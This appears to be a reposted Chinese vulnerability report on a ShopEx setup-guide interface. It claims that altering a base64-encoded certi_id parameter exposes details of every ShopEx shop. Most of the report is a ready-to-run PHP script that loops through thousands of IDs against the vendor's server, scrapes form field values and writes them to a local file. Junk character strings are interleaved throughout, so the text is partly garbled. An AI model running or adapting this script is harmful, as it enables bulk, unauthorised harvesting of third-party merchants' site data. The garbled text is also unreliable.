|
简要描述:
) a% S/ O0 [2 j- b" v! cShopEx某接口缺陷,可遍历所有网站7 G6 W/ i$ ^/ c% e1 k8 t
详细说明:
6 G: a$ n8 x" V5 ]' o. C问题出现在shopex 网店使用向导页面
2 {6 W" M" I5 \* E" t6 B( J$ @6 B" m& \- N! W! }
. a1 \8 u& V5 D% S6 I
( r) i1 N- f& ?. L. y1 {* @http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
' m7 H% {. y$ G
7 S" N) B* U1 l- i8 ^3 [$ A
. g; O5 |! V a1 m0 T0 N- G" ?9 S! V9 o5 X" k Q
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}2 u% Z% i1 k. a1 c6 j* f% Q
* \/ \0 i; H9 r! m
0 o) |7 O" v- ?: A! \; F2 Q9 @- v' L$ R9 _
# D- B4 Y$ J& k0 s3 O" H6 J3 n我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
+ V6 V0 x$ K! G8 z- o4 F N; ^3 \, f% U- A4 R- h% P7 q3 u
+ @ H5 R, z$ i" b6 L2 `5 u
+ b* w" m$ ~9 `4 H: i; ?4 @9 t1 X<?php
! n1 J" s- m$ k& d7 z7 v( o, U0 K$ s
for ($i=1; $i < 10000; $i++) { //遍历- E0 S- U! T. n# |" e! n" {
8 P" w3 p+ w8 E1 E
ShowshopExD($i);3 G& g& _7 J* a3 V/ U6 Z
, R* G1 r" i' E; }
}9 U* P% R& \0 `6 p
# b0 K. [8 q8 t0 J
function ShowshopExD($cid) {
4 \# Y! r2 [1 w9 O6 Y* y, l. ?2 @0 _
$url='http://guide.ecos.shopex.cn/step2.php'; p0 b( Y1 ?2 a, ^* `
' E J0 \9 L# m: l
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
" s. B. ]' @& ]+ W+ @8 l- \, T
9 D7 _2 ]( q8 l0 W: `4 o $url = $url.'?refer='.$refer;8 [/ _; e2 T& v2 s" M: J2 ]; {: ], c0 `
. j x0 }& [$ S $ch = curl_init($url);
- f$ P! O4 m, S
% o* n% x" d/ Q0 s# K# n curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
- \4 W4 y( O1 T8 `* j
2 [" Z+ A3 t9 ~( I/ @: r+ m9 c curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
# S9 B6 s3 \. J8 I8 p
. p( ^. d& }2 i8 Q4 y) h& P5 f) Z0 \ $result = curl_exec($ch);
- b" D1 |& R+ L4 G) U/ I7 i( d$ c
: ]$ O" o, B3 r, P* ~ $result = mb_convert_encoding($result, "gb2312", "UTF-8");
0 p7 t4 Z) s1 i N/ j; b& y+ a" _- d8 p% D" C4 ]6 s
if(strpos($result,$refer))7 k3 Q7 C: j' q' x8 ~- O* ~
& w! [9 \' m8 y) N+ M- }$ \, F# ?
{
3 f, E. I% p. X: I
2 w3 q9 j* _# h $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
d& {7 z: J, P9 ]& i
& E7 |+ r/ U! _3 L( k { preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);; v8 t& C1 x n7 I1 Q
- j) p# [; O& Q* E% [& Y: s
foreach ($value[1] as $key) { S7 ~3 x5 D5 X; I+ Z4 J+ }
3 H( g" w& S# @# Y
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);5 O: w" B% _9 W
' R9 L+ V" n" n3 x) o) a+ p9 _ echo $res[1][0].':'.$res[3][0]."\r\n";6 J9 T2 z! ?/ T" P0 v
! p9 `& g" R4 [ S $col =$res[1][0].':'.$res[3][0]."\r\n";
; F8 t6 i1 e$ k* k# r+ m, d! R, R+ n) I
fwrite($fp, $col, strlen($col)); ! C& a( ]0 @( P" {% G, e% |& o3 I
5 Y5 j6 I7 q% h7 ]" I0 n+ ~8 \0 F }
" T) F" }5 U: i/ T( O1 y2 A% H2 M* ]+ k) b
echo '--------------------------------'."\r\n";
/ @9 y- {8 m* T+ ]7 Q3 ]/ _
: D u( n5 |6 s- Y- P1 @9 ] fclose($fp); ) Z2 B' X4 B' J# d. s% ~
* `$ t* x9 W1 r! m }$ n$ T/ Y! f9 e$ ~3 a" h
: O: I+ p! B4 p2 z* F
flush();
6 G+ ]$ k: B g% ^' a3 {- e0 F* M! S- B( T% ?% N) S$ e+ k
curl_close($ch);6 m% v ^! G+ e! h
2 }9 C) {- j) ^! ~) L! X: w K }
. I* X9 _# W& o3 |( S9 }- ~6 T: v D n( n
?>9 z3 {2 w$ j$ E: y( s! [( u% P$ B
漏洞证明:
u" R$ Y4 Y/ K- yhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
: Q' o$ ?5 l! M6 x4 c0 m, Xrefer换成其他加密方式
6 M6 N. l! k- ]/ W2 V |
|